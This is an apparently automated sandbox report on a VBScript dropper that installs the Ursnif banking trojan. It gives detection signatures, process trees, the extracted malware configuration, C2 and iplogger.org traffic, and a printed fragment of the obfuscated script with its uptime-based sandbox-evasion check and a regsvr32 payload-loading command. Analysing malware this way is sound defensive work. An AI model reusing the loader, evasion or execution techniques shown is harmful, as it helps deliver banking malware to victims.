Loading ...

Play interactive tourEdit tour

Analysis Report view_presentation#_52197.vbs

Overview

General Information

Sample Name:view_presentation#_52197.vbs
MD5:0eaf069ed296fade8d7a8e2df601b008
SHA1:bd7d4a645643b0661f52e277be6a0ed40a111740
SHA256:86405cce34317c8ea22428238f8a79e96b3e2c7e417a2279038dee3dbb77f580

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates a COM Internet Explorer object
Creates processes via WMI
Deletes itself after installation
Machine Learning detection for dropped file
Sigma detected: Regsvr32 Anomaly
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains functionality locales information (e.g. system language)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 5484 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_presentation#_52197.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • regsvr32.exe (PID: 5596 cmdline: regsvr32 -s C:\Users\user\AppData\Local\Temp\share.pea MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 5588 cmdline: -s C:\Users\user\AppData\Local\Temp\share.pea MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 5028 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 2820 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5028 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250143", "uptime": "307", "system": "ea69fb5c343103617cab0e150d800b31@", "size": "0", "crc": "1", "action": "00000000", "id": "3300", "time": "1593042348", "user": "31b341dd54c8a3b79c4b2eb5ed206b91", "hash": "0x00000000", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.1050413863.0000000005668000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000003.00000003.1050561556.0000000005668000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.1050793585.0000000005668000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000003.1050493552.0000000005668000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.1050760234.0000000005668000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 5 entries

            Sigma Overview


            System Summary:

            barindex
            Sigma detected: Regsvr32 AnomalyShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: -s C:\Users\user\AppData\Local\Temp\share.pea, CommandLine: -s C:\Users\user\AppData\Local\Temp\share.pea, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -s C:\Users\user\AppData\Local\Temp\share.pea, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 5596, ProcessCommandLine: -s C:\Users\user\AppData\Local\Temp\share.pea, ProcessId: 5588

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: regsvr32.exe.5588.3.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250143", "uptime": "307", "system": "ea69fb5c343103617cab0e150d800b31@", "size": "0", "crc": "1", "action": "00000000", "id": "3300", "time": "1593042348", "user": "31b341dd54c8a3b79c4b2eb5ed206b91", "hash": "0x00000000", "soft": "3"}
            Multi AV Scanner detection for domain / URLShow sources
            Source: cdn.arsis.atVirustotal: Detection: 6%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\share.peaVirustotal: Detection: 33%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\share.peaReversingLabs: Detection: 45%
            Multi AV Scanner detection for submitted fileShow sources
            Source: view_presentation#_52197.vbsVirustotal: Detection: 8%Perma Link
            Source: view_presentation#_52197.vbsReversingLabs: Detection: 16%
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\share.peaJoe Sandbox ML: detected

            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BE258E Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,3_2_02BE258E
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior

            Networking:

            barindex
            Creates a COM Internet Explorer objectShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: Joe Sandbox ViewIP Address: 88.99.66.31 88.99.66.31
            Source: Joe Sandbox ViewIP Address: 88.99.66.31 88.99.66.31
            Source: Joe Sandbox ViewASN Name: unknown unknown
            Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
            Source: global trafficHTTP traffic detected: GET /api1/enifBZeeo/w3KzFaeh6LAMrUHY60UP/d_2BvFI4RiT3bjlqSap/TPIx0eRKVYwzRlg4wpqySC/bepW5cN2GDlkY/NICwNucs/W0ZVQFKVfywvFCwajqHrWcU/a5uICKiysp/nbJWY2W9CTgUpWn0D/H6CpJGKSi7_2/BRksJYYjSsH/69pntuthfj6Tm_/2BGiIvkEjUX4Q2h7BSyGi/OzY4YuOFgp0ytbuu/K65rPn4UZtibx4W/v9kBxqmY3p9BziO95r/BFXVPmOKY/e_0A_0DACpty_2FdlXE2/91_2FRSZoEES_2FPk2x/wRsyIod_2Fk4ExqtfeBXaQ/s4ygL2BZVjNoZ5z/64hDM9K HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.arsis.atConnection: Keep-Alive
            Source: msapplication.xml0.11.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xac0ecb8d,0x01d64a81</date><accdate>0xac0ecb8d,0x01d64a81</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml0.11.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xac0ecb8d,0x01d64a81</date><accdate>0xac0ecb8d,0x01d64a81</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml5.11.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xac1651a2,0x01d64a81</date><accdate>0xac1651a2,0x01d64a81</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml5.11.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xac1651a2,0x01d64a81</date><accdate>0xac18da05,0x01d64a81</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml7.11.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xac1b890e,0x01d64a81</date><accdate>0xac1b890e,0x01d64a81</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml7.11.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xac1b890e,0x01d64a81</date><accdate>0xac1b890e,0x01d64a81</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: iplogger.org
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Jun 2020 14:45:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d 00 8a d8 e8 43 a5 41 76 01 15 41 79 79 e9 99 79 15 c8 72 fa 20 d3 c1 0c a8 cb 00 90 3b 34 31 a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T*$'*gd*SJRl2MCAvAyyyr ;410
            Source: wscript.exe, 00000000.00000003.805172470.0000022D6C131000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
            Source: wscript.exe, 00000000.00000002.828251141.0000022D6C436000.00000004.00000001.sdmpString found in binary or memory: http://cert.int-x3.letsencrypt.org/0
            Source: wscript.exe, 00000000.00000002.828251141.0000022D6C436000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
            Source: wscript.exe, 00000000.00000003.805172470.0000022D6C131000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
            Source: wscript.exe, 00000000.00000003.805172470.0000022D6C131000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
            Source: wscript.exe, 00000000.00000003.805172470.0000022D6C131000.00000004.00000001.sdmpString found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
            Source: wscript.exe, 00000000.00000002.828251141.0000022D6C436000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
            Source: msapplication.xml.11.drString found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml1.11.drString found in binary or memory: http://www.google.com/
            Source: msapplication.xml2.11.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml3.11.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml4.11.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml5.11.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml6.11.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml7.11.drString found in binary or memory: http://www.youtube.com/
            Source: wscript.exe, 00000000.00000002.828251141.0000022D6C436000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.821941342.0000022D69F67000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/
            Source: wscript.exe, 00000000.00000003.822612116.0000022D68ED3000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1bD467
            Source: wscript.exe, 00000000.00000003.822612116.0000022D68ED3000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1bP467
            Source: wscript.exe, 00000000.00000003.810134979.0000022D69F00000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1bP467o
            Source: wscript.exe, 00000000.00000003.821164281.0000022D69E01000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1bP467pace
            Source: wscript.exe, 00000000.00000003.821941342.0000022D69F67000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/Inz
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.1050413863.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050561556.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050793585.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050493552.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050760234.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050623186.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050187348.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1195060386.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050313351.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5588, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.1050413863.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050561556.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050793585.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050493552.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050760234.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050623186.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050187348.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1195060386.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050313351.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5588, type: MEMORY

            System Summary:

            barindex
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72FF15F3 NtMapViewOfSection,3_2_72FF15F3
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72FF18DB GetProcAddress,NtCreateSection,memset,3_2_72FF18DB
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72FF2775 NtQueryVirtualMemory,3_2_72FF2775
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BE3A67 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_02BE3A67
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BEAEB5 NtQueryVirtualMemory,3_2_02BEAEB5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72FF25543_2_72FF2554
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BEAC943_2_02BEAC94
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BE15D63_2_02BE15D6
            Source: view_presentation#_52197.vbsInitial sample: Strings found which are bigger than 50
            Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: classification engineClassification label: mal100.bank.troj.evad.winVBS@7/17@2/2
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_presentation#_52197.vbs'
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: view_presentation#_52197.vbsVirustotal: Detection: 8%
            Source: view_presentation#_52197.vbsReversingLabs: Detection: 16%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_presentation#_52197.vbs'
            Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\Users\user\AppData\Local\Temp\share.pea
            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\share.pea
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5028 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\share.peaJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5028 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: view_presentation#_52197.vbsStatic file information: File size 1155325 > 1048576
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dllJump to behavior
            Source: Binary string: c:\West\open\close\allow\Claim\neck\horse\bring\girl.pdb source: wscript.exe, 00000000.00000003.795866192.0000022D68EED000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.1195299092.0000000073018000.00000002.00020000.sdmp, share.pea.0.dr

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.ScriptName, cStr(762469371)) > 0 And Delano = 0) Then' ferruginous bub impetuous sunk tilth melodrama636, diminutive Bellamy drought disambiguate. furrow loam specimen Myra petticoat Eliot jargon betoken, 1078986 cardboard Quantico sequin puck releasable Talmudic sue ostensible Thompson Noreen941 cryptogram taut swum simian product, 4632214 Larsen Paulo legatee transshipping Stanhope Chao cheetah Madeira splendid material ideology Parisian delinquent Schumann fain681 Orwell Exit FunctionEnd If' major foamy quota maritime Abelson interrogatory imaginate photolytic prison Idaho Fullerton soutane102 set pietism = GetObject("winmgmts:\\.\root\cimv2")set YipPG = pietism.InstancesOf("Win32_OperatingSystem")for each Cornell in YipPGtE = Cornell.LastBootUpTimeuDD = Mid(tE,1,4) & "-" & Mid(tE,5,2) & "-" & Mid(tE,7,2) & " " & Mid(tE,9,2) & ":" & Mid(tE,11,2) & ":" & Mid(tE,13,2)' waxwork, 9664912 parallelogram. patron churchwomen middle Brenner reversible stockroom requisite phenomena candlelight almighty matron, 83899 Charlottesville practise Geiger improve delectate defiant Spirogyra discern betide might AnHec = abs(datediff("s",uDD,now))' yesterday, genii canoe, bimetallic seclude. heifer mandate. funny nectar module divan waterside hidalgo homologue Bloomfield jumble. Becky goody kink immune playhouse barony distaff relieve cavort weal trinitarian bandstand442 trailblazer inquisitor aflame. 5073367 melanoma onto conclusion, 9529084 synecdoche indistinguishable bedspring goXdE = AnHec \ 60vacuolate = goXdE \ 60REM note selfish consortium surgery floorboard eutrophication immemorial goXdE = goXdE mod 60AnH = AnH mod 60If (vacuolate = 0 And goXdE < 10) ThenMM118End IfnextREM Fermat colic hump Yates publication landslide offhand septic lengthy teach transcription isinglass bedspread pole trainmen tallyho immature Cohn Hearst profile End FunctionFunction forbore(pan385, bullish294)REM bipedal drone actinolite, Garrisonian shoelace mealtime, 8483643 foldout grave chrysalis. doodle organismic pattern swam corrigendum FMC caterpillar Beckman betatron Mattson crucifix weighty Clinton justiciable908 Lubell tuberculin bureaucratic engine Jimmie palsy Reuben warehousemen convulsion wry argue, Vought Mbabane intangible swift Berlitz rapture diorama Chablis sank sit Dim flesh, arSet flesh = CreateObject("Scripting.FileSystemObject")REM jettison gelatinous Phipps, pediatric etude officeholder Jeffrey viburnum composite obsess, basidiomycetes, 9381873 grease Poisson stove suzerain commune impedance Attica Avernus ping summer tektite Politburo blindfold ruby Volstead implementation analogue garland associable spay caution contention bone complementarity servant polytope funny813 mug sabotage septillion didnt Set ar = flesh.CreateTextFile(pan385, True)Dim YyaDY: YyaDY = (418 - ((123 - 2.0) - (71 - 68.0)))Dim astute301: astute301 = (((1041 - 759.0) - 146.0) - (137 - 1.0))For Each Eb In bullish294Randomizecheetah412 = Int((YyaDY-astute301+1)*Rnd+astute301)
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72FF24F0 push ecx; ret 3_2_72FF24F9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72FF2543 push ecx; ret 3_2_72FF2553
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BEAC83 push ecx; ret 3_2_02BEAC93
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BEED26 pushfd ; retf 3_2_02BEED36
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02BEA950 push ecx; ret 3_2_02BEA959
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_7300450B push edx; retf 3_2_73004512
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_73004728 push ss; iretd 3_2_73004730
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_73003990 push ecx; retf 3_2_730039DF
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_73003992 push ecx; retf 3_2_730039DF
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_730075DF push dword ptr [ebp-04834675h]; iretd 3_2_730075E9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_73006FF3 push 00000019h; iretd 3_2_73006FF6
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_73004018 pushfd ; retf 3_2_7300401B
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_73005041 push ss; iretd 3_2_73005044
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_73006276 push edx; retf 3_2_73006277

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\share.peaJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\share.peaJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.1050413863.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050561556.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050793585.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050493552.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050760234.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050623186.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050187348.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1195060386.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1050313351.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5588, type: MEMORY
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\view_presentation#_52197.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_3-4718
            Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-4554
            Source: C:\Windows\System32\wscript.exe TID: 4188Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
